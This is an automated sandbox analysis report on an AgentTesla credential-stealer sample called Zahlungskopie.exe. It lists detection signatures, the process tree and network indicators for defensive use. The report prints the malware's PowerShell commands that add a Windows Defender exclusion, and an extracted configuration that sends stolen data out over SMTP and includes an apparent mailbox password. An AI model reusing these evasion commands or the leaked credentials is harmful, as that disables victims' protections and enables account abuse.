Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Zahlungskopie.exe

Overview

General Information

Sample Name:Zahlungskopie.exe
Analysis ID:361303
MD5:9615a1c5bc0707a4248b1f138b834c2e
SHA1:ff9de956805883e95f6c2e17690ed64093875f74
SHA256:09ed9ccee27444a684fb38f7137ab2328963596a5e679acee296210e0c1c15a1
Tags:AgentTeslaDEUexegeoMailChannels
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • Zahlungskopie.exe (PID: 984 cmdline: 'C:\Users\user\Desktop\Zahlungskopie.exe' MD5: 9615A1C5BC0707A4248B1F138B834C2E)
    • AdvancedRun.exe (PID: 6584 cmdline: 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6712 cmdline: 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /SpecialRun 4101d8 6584 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6856 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6884 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Zahlungskopie.exe (PID: 5780 cmdline: C:\Users\user\Desktop\Zahlungskopie.exe MD5: 9615A1C5BC0707A4248B1F138B834C2E)
    • Zahlungskopie.exe (PID: 3660 cmdline: C:\Users\user\Desktop\Zahlungskopie.exe MD5: 9615A1C5BC0707A4248B1F138B834C2E)
    • Zahlungskopie.exe (PID: 6448 cmdline: C:\Users\user\Desktop\Zahlungskopie.exe MD5: 9615A1C5BC0707A4248B1F138B834C2E)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "info.network@greatdeck.coGreatd@2018$!mail.greatdeck.co"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.913027538.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Zahlungskopie.exe PID: 6448JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: Zahlungskopie.exe PID: 6448JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            18.2.Zahlungskopie.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 18.2.Zahlungskopie.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "info.network@greatdeck.coGreatd@2018$!mail.greatdeck.co"}
              Multi AV Scanner detection for submitted fileShow sources
              Source: Zahlungskopie.exeReversingLabs: Detection: 29%
              Source: 18.2.Zahlungskopie.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8

              Compliance:

              barindex
              Uses insecure TLS / SSL version for HTTPS connectionShow sources
              Source: unknownHTTPS traffic detected: 99.86.159.34:443 -> 192.168.2.4:49734 version: TLS 1.0
              Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
              Source: Zahlungskopie.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Binary contains paths to debug symbolsShow sources
              Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe, 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000009.00000000.695170028.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr
              Source: Joe Sandbox ViewIP Address: 151.101.2.133 151.101.2.133
              Source: Joe Sandbox ViewIP Address: 151.101.2.133 151.101.2.133
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: unknownHTTPS traffic detected: 99.86.159.34:443 -> 192.168.2.4:49734 version: TLS 1.0
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: OtherHost: www.chelseafc.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /base/83650593F542427F159D29BCCFD755F9.html HTTP/1.1User-Agent: OtherHost: 0k10dk21kkeok2e.onlineConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /base/0A48866E716B370203D6A936495BDF28.html HTTP/1.1User-Agent: OtherHost: 0k10dk21kkeok2e.online
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: OtherHost: www.liverpoolfc.comConnection: Keep-Alive
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.facebook.com/manchesterunited " target="_blank" data-an-track="true" data-track-type="link" data-track-text="https://www.facebook.com/manchesterunited "> equals www.facebook.com (Facebook)
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.youtube.com/manutd" target="_blank" data-an-track="true" data-track-type="link" data-track-text="https://www.youtube.com/manutd"> equals www.youtube.com (Youtube)
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.facebook.com/realmadrid" onclick="dataLayer.push({'eventCategory': dataLayer[0].pageHier,'eventAction': 'Clic_rrssfooter','event': 'click|iraFacebook', 'eventLabel':'Facebook' });" class="social_facebook_btn" target="_blank" style="margin-left: 12px; vertical-align: middle;">Facebook</a> equals www.facebook.com (Facebook)
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.twitter.com/realmadrid" onclick="dataLayer.push({'eventCategory': dataLayer[0].pageHier,'eventAction': 'Clic_rrssfooter','event': 'click|iraTwitter', 'eventLabel':'Twitter' });" class="social_twitter_btn" target="_blank" style="vertical-align: middle;">Twitter</a> equals www.twitter.com (Twitter)
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.youtube.com/realmadrid" onclick="dataLayer.push({'eventCategory': dataLayer[0].pageHier,'eventAction': 'Clic_rrssfooter','event': 'click|iraYoutube', 'eventLabel':'Youtube' });" class="social_youtube_btn" target="_blank" style="margin-left: 12px; vertical-align: middle;">Youtube</a> equals www.youtube.com (Youtube)
              Source: unknownDNS traffic detected: queries for: www.chelseafc.com
              Source: Zahlungskopie.exeString found in binary or memory: http://0k10dk21kkeok2e.online/base/0A48866E716remove_ParentChangedB370203D6A936495BDF28.html
              Source: Zahlungskopie.exeString found in binary or memory: http://0k10dk21kkeok2e.online/base/0A48866E716remove_ParentChangedB370203D6A936495BDF28.htmlchttp://
              Source: Zahlungskopie.exe, 00000000.00000002.732169807.0000000002F01000.00000004.00000001.sdmpString found in binary or memory: http://0k10dk21kkeok2e.online/base/83650593F542427F159D29BCCFD755F9.html
              Source: Zahlungskopie.exeString found in binary or memory: http://0k10dk21kkeok2e.online/base/83650FSWAsyncResult593F542427F159D29BCCFD755F9.html
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://0k10dk21kkeok2e.online4
              Source: Zahlungskopie.exe, 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: Zahlungskopie.exe, 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmpString found in binary or memory: http://CujwPV.com
              Source: Zahlungskopie.exe, 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://bootroom.liverpoolfc.com
              Source: Zahlungskopie.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: Zahlungskopie.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
              Source: Zahlungskopie.exe, 00000000.00000002.779615723.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
              Source: Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1.crt0
              Source: Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
              Source: Zahlungskopie.exe, 00000000.00000002.779615723.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: Zahlungskopie.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
              Source: Zahlungskopie.exe, 00000000.00000002.779615723.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
              Source: Zahlungskopie.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: Zahlungskopie.exe, 00000000.00000002.779615723.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
              Source: Zahlungskopie.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: Zahlungskopie.exe, 00000000.00000002.779615723.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0L
              Source: Zahlungskopie.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
              Source: Zahlungskopie.exe, 00000000.00000002.779615723.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0L
              Source: Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
              Source: Zahlungskopie.exe, 00000000.00000002.779615723.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: Zahlungskopie.exe, 00000000.00000003.650314930.0000000005F82000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
              Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: Zahlungskopie.exe, 00000000.00000003.650314930.0000000005F82000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7a8ef2c1ee773
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://events.liverpoolfc.com
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://instagram.com/manchesterunited
              Source: Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpString found in binary or memory: http://o.ss2.us/0
              Source: Zahlungskopie.exe, 00000000.00000002.779615723.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Zahlungskopie.exeString found in binary or memory: http://ocsp.digicert.com0C
              Source: Zahlungskopie.exe, 00000000.00000002.779615723.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0F
              Source: Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0G
              Source: Zahlungskopie.exeString found in binary or memory: http://ocsp.digicert.com0O
              Source: Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
              Source: Zahlungskopie.exe, 00000000.00000002.779615723.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmp, AdvancedRun.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpString found in binary or memory: http://s.ss2.us/r.crl0
              Source: Zahlungskopie.exe, 00000000.00000002.732169807.0000000002F01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://store.liverpoolfc.com
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://www.carlsberg.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732169807.0000000002F01000.00000004.00000001.sdmpString found in binary or memory: http://www.chelseafc.com
              Source: Zahlungskopie.exeString found in binary or memory: http://www.chelseafc.com/
              Source: Zahlungskopie.exeString found in binary or memory: http://www.chelseafc.com/-http://www.manutd.com/9http://www.mancity.com/base/
              Source: Zahlungskopie.exeString found in binary or memory: http://www.digicert.com/CPS0
              Source: Zahlungskopie.exeString found in binary or memory: http://www.liverpoolfc.WaitForConnectionAsynccom/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://www.liverpoolfc.com
              Source: Zahlungskopie.exeString found in binary or memory: http://www.liverpoolfc.com/
              Source: Zahlungskopie.exeString found in binary or memory: http://www.liverpoolfc.com/?http://www.realmadrid.com/base/#User-Agent:
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpString found in binary or memory: http://www.liverpoolfc.com/accessible/accessible
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpString found in binary or memory: http://www.liverpoolfc.com/contactus
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://www.liverpoolfc.com/corporate/anti-slavery
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpString found in binary or memory: http://www.liverpoolfc.com/corporate/browser-support
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpString found in binary or memory: http://www.liverpoolfc.com/corporate/rss-feeds
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://www.liverpoolfc.com/history/heysel
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://www.liverpoolfc.com/history/hillsborough
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://www.liverpoolfc.com/legal/cookies
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://www.liverpoolfc.com/legal/privacy-policy
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://www.liverpoolfc.com/legal/terms-and-conditions
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://www.liverpoolfc.com/lfcevents
              Source: Zahlungskopie.exeString found in binary or memory: http://www.mancity.com/base/
              Source: Zahlungskopie.exe, 00000000.00000002.732169807.0000000002F01000.00000004.00000001.sdmpString found in binary or memory: http://www.mancity.com/base/qDRJjWQmMciVzZexKqxHvQNCUcCUOevUqtCcibaOeqaXQSxokmSbdsVNdhpUn.html
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://www.mancity.com4
              Source: Zahlungskopie.exeString found in binary or memory: http://www.manutd.cget_UserSetCursorom/
              Source: Zahlungskopie.exeString found in binary or memory: http://www.manutd.com/
              Source: Zahlungskopie.exe, 00000000.00000002.732290944.0000000002F36000.00000004.00000001.sdmpString found in binary or memory: http://www.manutd.com4
              Source: powershell.exe, 0000000B.00000003.818040195.0000000008567000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.co
              Source: AdvancedRun.exe, AdvancedRun.exe, 00000009.00000000.695170028.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.drString found in binary or memory: http://www.nirsoft.net/
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://www.realmadrid.com
              Source: Zahlungskopie.exeString found in binary or memory: http://www.realmadrid.com/base/
              Source: Zahlungskopie.exe, 00000000.00000002.732169807.0000000002F01000.00000004.00000001.sdmpString found in binary or memory: http://www.realmadrid.com/base/qDRJjWQmMciVzZexKqxHvQNCUcCUOevUqtCcibaOeqaXQSxokmSbdsVNdhpUn.html
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://www.realmadrid.com/en
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://www.realmadrid.com/fr
              Source: Zahlungskopie.exeString found in binary or memory: http://www.realmadrid.set_DisallowApplicationBaseProbingcom/base/
              Source: Zahlungskopie.exeString found in binary or memory: http://www.realmadrid.set_DisallowApplicationBaseProbingcom/base/%.IsThisPointerhtml
              Source: Zahlungskopie.exeString found in binary or memory: http://www.set_StringFormatchelseafc.com/
              Source: Zahlungskopie.exeString found in binary or memory: http://www.set_StringFormatchelseafc.com/Ohttp://www.manutd.cget_UserSetCursorom/Shttp://wwwSetUnres
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://www.standardchartered.com/home/en/index.html?camp_id=liverpool_source=liverpoolfctv_medium=4
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: http://www.verbier.ch/en/index.htm?reset=1
              Source: Zahlungskopie.exeString found in binary or memory: http://wwwSetUnresolved.mancity.com/base/
              Source: Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpString found in binary or memory: http://x.ss2.us/x.cer0&
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://app.adjust.com/88iacno_eo402dp?campaign=Footer&amp;adgroup=MUOfficialApp&amp;creative=180910
              Source: Zahlungskopie.exe, 00000000.00000002.732290944.0000000002F36000.00000004.00000001.sdmpString found in binary or memory: https://assets.manutd.com/AssetPicker/images/0/0/14/154/957027/OT_LR_2_1080x5661611683583510_large.j
              Source: Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/images/AjaxLoader-298x179.gif
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/images/lfc-pl-logos-full
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/images/logo-pl-champs-desk-3
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/images/logo.png
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/js/home-scripts.min.js
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/js/scripts.min.js
              Source: Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/misc/0002/14/thumb_113618_misc_general_234x23
              Source: Zahlungskopie.exe, 00000000.00000002.732325527.0000000002F49000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/misc/0002/14/thumb_113619_misc_general_234x23
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/08/7abcb0d130016504c4a4761ae
              Source: Zahlungskopie.exe, 00000000.00000002.738784790.0000000003F01000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/08/a645dcf8e1f1cf28fb38a0701
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/aa0024fde91a556201a3e18ac
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/caba13e5118c92cd18eab74b2
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/f9d2bf533c57965e0174bf510
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/16/thumb_15152_partnerlogo_p
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/41/thumb_40979_partnerlogo_p
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/73/thumb_72807_partnerlogo_p
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/73/thumb_72810_partnerlogo_p
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/74/thumb_73386_partnerlogo_p
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/74/thumb_73714_partnerlogo_p
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/78/thumb_77004_partnerlogo_p
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/90/thumb_89785_partnerlogo_p
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/92/thumb_91232_partnerlogo_p
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/92/thumb_91236_partnerlogo_p
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/02/thumb_101725_partnerlogo_
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/08/thumb_107008_partnerlogo_
              Source: Zahlungskopie.exe, 00000000.00000002.732446576.0000000002F62000.00000004.00000001.sdmpString found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/08/thumb_107697_partnerlogo_
